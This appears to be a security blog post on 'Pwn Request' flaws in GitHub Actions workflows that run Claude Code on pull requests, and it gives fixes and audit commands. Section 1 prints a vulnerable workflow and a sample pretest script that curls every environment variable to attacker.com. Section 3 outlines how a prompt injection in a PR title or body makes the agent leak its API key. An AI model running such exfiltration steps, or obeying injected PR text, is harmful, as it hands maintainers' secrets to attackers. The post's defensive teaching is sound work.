ShipSafe
GitHub Actions, Pwn Request, Claude Code, Security

Pwn Request Meets AI Agents: How GitHub Workflows Leak Your Secrets

pull_request_target plus actions/checkout of the PR ref equals secrets in the attacker's hands. Add a Claude Code agent on top and you get exfil from a single PR. Here's the pattern and the fix.

8 min read

You set up a GitHub Action that runs Claude Code on incoming PRs. You used pull_request_target because Anthropic's example used it. You added actions/checkout with ref: ${{ github.event.pull_request.head.sha }} because you wanted the agent to see the actual PR code.

You just built a Pwn Request. A complete stranger can open a PR with malicious code, your workflow checks it out and runs it with your GITHUB_TOKEN and your ANTHROPIC_API_KEY attached, and they walk away with everything.

Pwn Request has been a known pattern for years. Adding AI agents on top didn't fix it. It made the surface area bigger and the audience much larger.

1. The Pwn Request pattern in 30 lines

The vulnerable shape:

# .github/workflows/ai-review.yml
name: AI PR Review
on:
  pull_request_target:  # ← runs with secrets

jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}  # ← attacker code

      - name: Run agent
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
        run: |
          npm install  # ← already runs attacker's install scripts
          npm test  # ← runs attacker's package.json scripts
          claude-code review .

The attacker's PR modifies package.json to add a pretest script:

{
  "scripts": {
    "pretest": "curl -X POST https://attacker.com/x -d \"$(env)\"",
    "test": "echo ok"
  }
}

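The workflow runs npm test. npm runs pretest first. Every environment variable in that step, including ANTHROPIC_API_KEY, gets POSTed to the attacker. The GITHUB_TOKEN is within reach too, because actions/checkout@v4 leaves it in the local git config by default. Total time from PR-open to credential-stolen: seconds. The maintainer doesn't have to approve anything; the workflow runs automatically on every PR.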

2. Why pull_request_target exists at all

The trigger was designed for legitimate cases that need secrets but don't need to run PR code:

  • Labeling a PR based on its files
  • Commenting "thanks for your contribution!" with a bot
  • Posting a coverage diff using only the base branch's test data
  • Auto-merging Dependabot PRs after CI passes

None of those need to check out the PR's code. They read the diff or metadata. The trigger is fine for that.
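A minimal sketch of one such safe use, the thank-you comment, assuming the GitHub CLI (gh) that ships on GitHub-hosted runners. The file name, workflow name, and comment text are illustrative. There is no actions/checkout step, so the job only touches PR metadata through the API.

```yaml
# .github/workflows/welcome.yml (hypothetical file name)
name: Welcome comment
on:
  pull_request_target:
    types: [opened]

# Grant only what the job needs: permission to comment on the PR.
permissions:
  pull-requests: write

jobs:
  comment:
    runs-on: ubuntu-latest
    steps:
      # No checkout: nothing from the PR is written to disk or executed.
      - name: Thank the contributor
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          PR_URL: ${{ github.event.pull_request.html_url }}
        run: gh pr comment "$PR_URL" --body "Thanks for your contribution!"
```

The PR URL reaches the script through an environment variable rather than being interpolated into the command line, which keeps PR-controlled strings out of the shell source.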

The bug is the combination: pull_request_target plus actions/checkout of the PR head plus any execution of the checked-out code. Each piece is fine in isolation. Together they hand secrets to anyone who can open a PR.

3. The AI-agent amplifier

Pwn Request was a known pattern before AI agents. GitHub Security Lab has a five-year-old post about it. Researchers have used it on Microsoft, Google, and Nvidia repos. So why is this a 2026 story?

Two reasons:

  • AI agent workflows want PR code in context. "Review this PR" or "run the tests and tell me what failed" both require the workflow to see the PR code. Lots of newcomers reach for pull_request_target without knowing the history.
  • AI providers add a second exfil path. Even without malicious code in the PR, the agent reading the PR title or body can be prompt-injected (the Comment and Control attack). If the workflow has ANTHROPIC_API_KEY attached because it's pull_request_target, that key leaks via the agent's own tool calls.

The attacker now has two parallel paths to the same prize. Block path one (the classic Pwn Request), they take path two (Comment and Control). Block path two with prompt hardening, they take path one. You need both fixed, and the right architecture closes both at once.

4. Fix 1: just use pull_request

The simplest fix:

name: AI PR Review
on: pull_request   # ← not pull_request_target

jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        # No ref needed: pull_request checks out the PR merge commit by default
      - name: Run agent
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
        run: claude-code review .

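Wait, that still has secrets and PR code. Yes, but a pull_request run triggered from a fork gets no repository secrets and only a read-only GITHUB_TOKEN. (Private repositories can opt in to sending secrets to fork PRs; leave that off.) So on a forked PR the agent fails to call Anthropic, which is what you want. Running the agent on that PR then takes a deliberate maintainer action after reviewing the code, such as pushing the reviewed commits to a branch in the main repository. Re-running the fork's run from the UI does not attach secrets.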

This breaks the "automatic AI review on every PR" UX. If you want that UX, use Fix 2.
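One way to give maintainers a deliberate, post-review trigger is a manually dispatched workflow pinned to the commit they actually read. The sketch below is an assumption about how you might wire that up, not part of the original setup: the file name and the sha input are hypothetical, and claude-code review . is the same placeholder command used above.

```yaml
# .github/workflows/ai-review-manual.yml (hypothetical file name)
name: AI PR Review (manual)
on:
  workflow_dispatch:
    inputs:
      sha:
        description: "Full commit SHA the maintainer has already reviewed"
        required: true
        type: string

permissions:
  contents: read

jobs:
  review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Pin to the reviewed commit, not a branch name, so later pushes
          # to the PR cannot change what runs.
          ref: ${{ inputs.sha }}
          persist-credentials: false
      - name: Run agent
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
        run: claude-code review .
```

Only users with write access can dispatch it, so the secret is exposed only to code a maintainer has chosen to run.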

5. Fix 2: split into two workflows

The right architecture for automatic AI review:

Workflow A — runs on pull_request, no secrets

name: AI Review (build)
on: pull_request

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Static analysis only
        run: |
          # Pure static analysis. No npm install. No agent calls.
          # Just generate facts about the PR.
          npx --no-install some-static-analyzer --output review.json
      - uses: actions/upload-artifact@v4
        with:
          name: review-data
          path: review.json

Workflow B — runs after A, has secrets, doesn't see PR code

name: AI Review (post)
on:
  workflow_run:
    workflows: ["AI Review (build)"]
    types: [completed]

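jobs:
  post:
    if: ${{ github.event.workflow_run.conclusion == 'success' }}
    runs-on: ubuntu-latest
    permissions:
      actions: read          # read the artifact from Workflow A's run
      pull-requests: write   # only if the comment is posted with GITHUB_TOKEN
    steps:
      - uses: actions/download-artifact@v4
        with:
          name: review-data
          run-id: ${{ github.event.workflow_run.id }}
          # Required to download from a different workflow run.
          github-token: ${{ secrets.GITHUB_TOKEN }}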
      - name: Validate schema
        # Reject if review.json doesn't match expected shape.
        run: jq -e '.findings | type == "array"' review.json
      - name: Comment with agent
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
        run: |
          claude-code summarize-findings review.json --post-to-pr

Workflow A has PR code, no secrets. Workflow B has secrets, only sees validated JSON. A malicious PR can break A (no consequence — no secrets attached). It cannot reach B (B doesn't check out the PR; it only reads a strict-schema artifact). The agent never touches attacker-controlled source.
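The one-line jq check in Workflow B only confirms that findings is an array. A stricter gate might look like the sketch below. The 500 KB cap, the 200-item limit, and the message field are assumptions for illustration; substitute whatever your analyzer actually emits.

```yaml
      # Possible replacement for the "Validate schema" step in Workflow B.
      - name: Validate schema
        run: |
          # Refuse oversized artifacts before parsing them.
          test "$(wc -c < review.json)" -le 512000
          # Exactly one top-level key, a bounded array, and only short
          # string messages. jq -e exits non-zero when the result is false.
          jq -e '
            (keys == ["findings"])
            and (.findings | type == "array" and length <= 200)
            and all(.findings[]; type == "object"
                    and (.message | type == "string" and length <= 500))
          ' review.json
```

Validation limits shape, not intent. The message strings still originate from a run the PR author controls, so the agent should treat them as data to summarize, never as instructions.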

6. Audit your repo

# Any workflow using pull_request_target?
rg -l 'pull_request_target' .github/workflows/

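# Of those, any that also check out the PR ref?
# (-r skips a stage when nothing matched, so rg never falls back to
#  searching the whole tree)
rg -l 'pull_request_target' .github/workflows/ | \
  xargs -r rg -l 'pull_request\.head' | \
  xargs -r rg -l 'actions/checkout'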

# Any workflow running an AI agent on PR content?
rg -l 'claude-code|copilot|codex|gemini|aider' .github/workflows/

Each hit on the second query is a Pwn Request candidate — fix immediately. Each hit on the third needs the Comment-and-Control hardening from the linked post. ShipSafe rule ai-agent/pwn-request-checkout automates the second query.
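If you'd rather have the second query run on every workflow change, it can be sketched as a CI check. This is an assumption-laden example, not the ShipSafe rule: the file name is hypothetical, and it uses grep instead of rg because grep is certain to be on the runner.

```yaml
# .github/workflows/workflow-audit.yml (hypothetical file name)
name: Workflow audit
on:
  pull_request:
    paths:
      - ".github/workflows/**"

permissions:
  contents: read

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false
      - name: Flag privileged triggers that check out the PR head
        run: |
          # The [_] and [.] brackets keep this file from matching its own patterns.
          hits=$(grep -rlE 'pull_request[_]target' .github/workflows/ \
            | xargs -r grep -lE 'pull_request[.]head' \
            | xargs -r grep -l 'actions/checkout' || true)
          if [ -n "$hits" ]; then
            echo "Pwn Request candidates:"
            echo "$hits"
            exit 1
          fi
```

Treat it as a lint, not a security boundary: on a pull_request run the workflow file comes from the PR itself, so a hostile PR can edit the check away. It catches honest mistakes before they merge.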

The bottom line

AI agents in CI are not a new attack surface. They're an old one (GitHub Actions) with a louder amplifier (LLM tool-calls + provider keys). The fix is the same architecture that worked for non-AI Pwn Request: never let untrusted code and privileged credentials live in the same job.

Related: Comment and Control for the prompt-injection half of the same problem.
